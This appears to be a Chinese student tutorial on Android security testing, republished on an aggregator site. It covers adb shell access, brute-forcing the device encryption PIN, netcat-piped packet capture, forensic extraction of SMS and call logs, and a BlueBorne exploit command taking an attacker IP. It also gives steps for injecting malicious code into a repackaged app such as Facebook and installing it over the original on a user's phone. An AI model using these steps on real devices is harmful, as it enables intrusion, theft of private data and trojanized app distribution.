内容简介:在过去的这个学期里,我报名参加了一个网络安全的课程。在期末考时我们的教授允许我们自己选择测试项目来完成,并作为期末考的成绩而无需再参加期末笔试。我立马抓住了这个机会(呵呵,谁想参加期末考呢?),我希望通过实践来了解更多关于移动安全方面的内容。在研究和阅读了相关的技术文档后,我决定自己写一篇教程。这是我人生中的第一篇与移动相关的教程文章,因此它可能并不全面。但我相信分享即是关怀,所以如果你有任何的意见或建议,可以随时与我取得联系。在Android架构中有5个层:应用程序,应用程序框架,库,运行时环境和Linu
背景
在过去的这个学期里,我报名参加了一个网络安全的课程。在期末考时我们的教授允许我们自己选择测试项目来完成,并作为期末考的成绩而无需再参加期末笔试。我立马抓住了这个机会(呵呵,谁想参加期末考呢?),我希望通过实践来了解更多关于移动安全方面的内容。
在研究和阅读了相关的技术文档后,我决定自己写一篇教程。这是我人生中的第一篇与移动相关的教程文章,因此它可能并不全面。但我相信分享即是关怀,所以如果你有任何的意见或建议,可以随时与我取得联系。
Android 架构
在Android架构中有5个层:应用程序,应用程序框架,库,运行时环境和 Linux 内核层。
应用程序层包含由用户安装的本机应用和第三方应用。应用程序框架层提供管理和控制应用程序层的服务,包括4个组件:活动,内容,服务,通知和广播。库层控制和访问应用程序数据。运行时包括Dalvik VM,所有 java 文件都以Dalvik格式(dex)进行转换,以在运行之前进行优化。内核层控制核心服务,如电源控制,安全性,硬件,内存管理等。
工具
我们先来下载Santoku。这是一个非常棒的开源虚拟机,专用于移动取证,分析和安全性。其中包含了我使用的所有工具。
- VM: Santoku ( https://santoku-linux.com/download/ )
准备
在开始之前,你需要将手机置于开发者模式,并打开USB调试。设置步骤如下:
设置 -> 关于手机 -> 版本号 -> 连击7次 -> 开发者设置模式打开 -> 转到USB调试 -> 启用
现在你可以将手机连接到计算机,并检查是否成功:
adb devices -l
一旦成功连接,你应该能够通过以上命令列出该设备。注意设备ID,你可以使用该ID来打开shell。
接下来,打开一个shell:
adb -s ce20c6e4 shell
现在,你就可以像在Linux环境中一样,例如列出所有文件及其权限:
这里有一篇关于爆破安卓PIN 码的文章: https://santoku-linux.com/howto/mobile-forensics/how-to-brute-force-android-encryption/
Header
$ adb shell dd if=/dev/block/mmcblk0p2 of=tmp_header bs=512 count=1 $ adb pull tmp_header ~/Desktop/tmp_header
Footer
$ adb shell mkdir /efs $ adb shell mount -t yaffs2 /dev/block/mtdblock6 /efs $ adb pull /efs/userdata_footer ~/Desktop/tmp_footer
爆破 PIN:
$ bruteforce_stdcrypto ~/Desktop/t/tmp_header ~/Desktop/t/tmp_footer
另一件非常有趣的事是启动tcpdump来收集一些数据包,并使用Wireshark来读取流量:
adb shell “tcpdump -s 0 -w — | nc -l -p 4444”
adb forward tcp:4444 tcp:4444
nc localhost 4444 | sudo wireshark -k -S -i
移动取证
接下来,我将用到一个在移动取证方面非常棒的工具AFLogical OSE。如果你想要提取出所有的文件,例如呼叫日志,mms,短信,图片,手机上安装的应用程序,其版本……等,这个 工具 将能帮到你。
导航到取证文件夹可以看到,提取的文件分别被放置在以日期命名的不同文件夹当中:
注意:这是我测试的Android手机,我只在Defcon期间使用…因此只有3个日期的数据。单击相应的文件夹后你可以看到如下内容:
我们双击打开一个csv文件内容如下:
以及打开info.xml文件,如下所示:
有趣的还在后头:
- 使用Blueborne解决手机的蓝牙问题(详情请参阅: https://armis.com/blueborne/ )
$ sudo apt-get install libbluetooth-dev $sudo pip2 install pybluez pwn scapy
要运行漏洞利用程序,此存储库的根目录必须位于PYTHONPATH中。
$ export PYTHONPATH=$PYTHONPATH:<repo-path> $ sudo python2 doit.py hci0 <target-bdaddr> <attacker-ip>
逆向一个 APK
在Android手机上对应用进行逆向实际上非常的容易。所需的工具及步骤如下:
工具
USB Debugger Dex2jar JD-Gui
步骤
从手机中提取的info.xml列表中下载应用程序
将应用程序反编译为.java文件
插入恶意代码并确保它可以运行
签名最终的apk文件
在用户手机上安装apk文件 – 替换原始应用程序
APK是一个压缩包,包含开发人员编译的证书,文件,清单,资源和dex代码。要获取应用程序的apk,你只需简单的网络搜索即可。
示例下载:Facebook(57.2mb),Skype(~30.7mb)和Twitter(29.8mb)。这里我将以Facebook apk文件为例。
首先,使用dex2jar来提取apk。之后,该工具会将所有新的.dex apk转换后的文件保存到.jar文件中。
文件夹中的内容如下:
要查看jar文件的源码,需要用到一个名为JD-GUI的工具。JD-GUI是一个Java反编译工具。现在,我们可以看到来自Facebook的所有声明的函数和源码。此时,所有文件都是可读和可修改的:
对于那些想要尝试将一些代码添加到应用程序并重新打包的人,以下是一个很好的例子:
$ adb connect 10.0.2.5 $ adb pull /system/framework/framework-res.apk $ apktool if framework-res.apk $ apktool d -r 你新的app名称.apk # 安装你的app
Open打开 – 修改现有的smali文件并创建恶意代码放到smali/com文件夹中。然后使用apktool重新打包b -f [app之前的名称]( – f覆盖现有文件)
创建一个用于签名 apk 文件的密钥:
keytool -alias am -genkey -v -keystore my-release-key.keystore-keyalg RSA -keysize 2048 -validity 10000
签名 apk 文件:
$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1-keystore my-releasekey.keystore [your-old-app-name].apk [$ jarsigner -keystore debug.keystore -sigalg SHA1withRSA test.apk androiddebugkey $ jarsigner -keystore debug.keystore -verify -verbose -certs test.apk]
安装新apk文件:
$ adb install [你的app名称].apk
漏洞查找
接下来,最后我们将用到一个名为Drozer的工具( https://github.com/mwrlabs/drozer )。
Drozer 简介
Drozer是MWR Labs开发的一款Android安全测试框架,是目前最好的Android安全测试工具之一。它允许你以一个普通android应用的身份与其他应用和操作系统交互。在Web世界已经有了许多安全测试工具了,我们只需要给出一个目标,这些工具就会自动为我们安全测试报告。但Drozer与这样的自动化扫描器不同,Drozer是一种交互式的安全测试工具。使用Drozer进行安全测试,用户在自己的工作站上输入命令,Drozer会将命令发送到Android设备上的代理程序执行。
Drozer 安装
$ adb install drozer-agent.apk
接下来,由于Drozer默认运行在31415端口上,我们可以将当前的adb端口转发到默认的Drozer端口。
$ adb forward tcp:31415 tcp:31415 Start a drozer session over default port 31415: $ drozer console connect
成功连接后应该会显示一个小的Android图标和运行界面在你的手机上。
一些你可能会用到的Drozer命令:list,shell,clean,load,module,unset,set,shell,run MODULE。
例如,检索所有包列表的信息:
dz> run app.package.list
确定一个攻击面(用你的应用程序名替换):
dz> run app.package.attacksurface sie571.sie571
最后,我为大家找了一些有关使用Drozer进行app渗透测试的技术文章。如果你对此感兴趣,建议你花些时间来阅读它们。
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
https://www.tutorialspoint.com/android_penetration_testing/android_penetration_testing_overview.asp
https://learn.techbeacon.com/units/how-get-started-mobile-penetration-testing-android
https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide
https://go.armis.com/hubfs/BlueBorne%20-%20Android%20Exploit%20(20171130).pdf?t=1541104049654
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf
https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-drozer/#gref
*参考来源: usejournal ,FB小编secist编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 容器管理方面的四大考量
- 最全面的推荐系统评估方法介绍
- 最全面的Navigation的使用指南
- Hackertarget:一款帮助组织发现攻击面的强大工具
- iOS面向切面的TableView-AOPTableView 原 荐
- 最全面的CQRS和事件溯源介绍 - Software House ASC
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Head First HTML and CSS
Elisabeth Robson、Eric Freeman / O'Reilly Media / 2012-9-8 / USD 39.99
Tired of reading HTML books that only make sense after you're an expert? Then it's about time you picked up Head First HTML and really learned HTML. You want to learn HTML so you can finally create th......一起来看看 《Head First HTML and CSS》 这本书的介绍吧!